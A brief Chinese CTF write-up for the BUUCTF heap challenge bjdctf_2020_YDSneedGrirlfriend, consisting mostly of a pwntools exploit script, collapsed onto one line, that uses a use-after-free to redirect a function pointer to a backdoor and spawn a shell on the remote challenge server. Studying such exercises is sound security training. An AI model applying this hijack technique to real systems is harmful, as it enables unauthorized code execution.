这道题知识点,题型与 actf_2019_babyheap这道题很相似,就不写那么详细了,又不了解的可以去看看

菜单






后门

EXP

from pwn import *p=remote('node3.buuoj.cn',29716)#p=process('./bjdctf_2020_YDSneedGrirlfriend')elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')def add(size,name):p.sendlineafter("Your choice :",'1')p.sendlineafter("Her name size is :",str(size))p.sendlineafter("Her name is :",name)def dele(index):p.sendlineafter("Your choice :",'2')p.sendlineafter("Index :",str(index))def show(index):p.sendlineafter("Your choice :",'3')p.sendlineafter("Index :",str(index))backdoor=0x400b9cadd(0x20,'aaaa')add(0x20,'bbbb')dele(0)dele(1)add(0x10,p64(backdoor))show(0)p.interactive()

BUUCTF (pwn) bjdctf_2020_YDSneedGrirlfriend(UAF)相关推荐

  1. [BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)

    mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转 ...

  2. 乱七八糟的pwn入门(六)——5.passcode

    审题 首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h>void login(){int passcod ...

  3. BUUCTF——rsa系列(4)

    目录 [BJDCTF2020]easyrsa [NCTF2019]babyRSA [AFCTF2018]可怜的RSA [RoarCTF2019]babyRSA [RoarCTF2019]RSA RSA ...

  4. BUUCTF misc 专题(83)从娃娃抓起

    下载附件,先看题目提示 题目描述:伟人的一句话,标志着一个时代的开始.那句熟悉的话,改变了许多人的一生,为中国三十年来计算机产业发展铺垫了道路.两种不同的汉字编码分别代表了汉字信息化道路上的两座伟大里 ...

  5. buuctf pwn wp(第四波)格式化字符串漏洞系列

    这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...

  6. BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)

    这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./e ...

  7. [BUUCTF]PWN——judgement_mna_2016(32位fmt)

    judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的 ...

  8. BUUCTF——rsa系列(2)

    目录 目录 Dangerous RSA [HDCTF2019]basic rsa [GUET-CTF2019]BabyRSA rsa2 RSA5 [NCTF2019]childRSA [HDCTF20 ...

  9. BUUCTF misc 专题(72)喵喵喵

    下载附件解压,是一张猫的图片 拖入到winhex中,并没有什么发现,放入stegsolve 在这里发现了png格式的照片,保存下来,发现打不开,拖入winhex 看到了头部有问题,以png为头,新建一 ...

最新文章

  1. 漫话:如何给女朋友解释什么是Git和GitHub?
  2. python软件包自带的集成开发环境-Python: 内置的集成开发环境-IDLE
  3. python监听多个udp端口_Python的Socket编程过程中实现UDP端口复用的实例分享
  4. (原创)对某国的一次渗透
  5. matlab与maple互联,Matlab,Maple和Mathematica三款主流科学计算软件的互操作
  6. spark学习-scala版写的SparkSQL程序读取Hbase表注册成表SQL查询
  7. SQL语句汇总(一)——数据库与表的操作以及创建约束
  8. Python 检测系统时间,k8s版本,redis集群,etcd,mysql,ceph,kafka
  9. Spark2.2(三十九):如何根据appName监控spark任务,当任务不存在则启动(任务存在当超过多久没有活动状态则kill,等待下次启动)...
  10. 基于皮尔森相关系数的协同过滤算法
  11. uchome登陆机制分析(三)
  12. 微信小程序、前端:背景图片样式拉伸不变形
  13. SC0084 AT32F407/437在UCOSIII上运行LwIP协议栈
  14. JAVA JNI中int和Integer完全不同
  15. 逐条讲解python_名校教授推荐:Python458集大型视频,从正确的方向出发学习
  16. Django 项目编码问题1UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd2 in position 0: invalid contin
  17. 明明安装了模块/包,Python提示无包/模块/报错
  18. 用计算机知道函数值求度数,怎么计算出余弦的度数
  19. SVG - 在Android中使用矢量图全攻略
  20. 光纤收发器常见故障问题的时候我们该如何解决呢

热门文章

  1. 原生Java代码拷贝目录
  2. Microsoft 顺序分析和聚类分析算法
  3. HotSpot 自动内存管理笔记与实战
  4. php中的empty和isset
  5. 稳定云服务器出租_云主机与独立服务器有哪些不同
  6. 【概念信息】成本中心计划
  7. 【转载】如何清晰地表达信息
  8. 把内表 itab1 的 n1 到 n2 行内容附加到 itab2 内表中去.
  9. ABAP知识:LIKE LINE OF 和LIKE TABLE OF
  10. 生产企业开具加工费发票的问题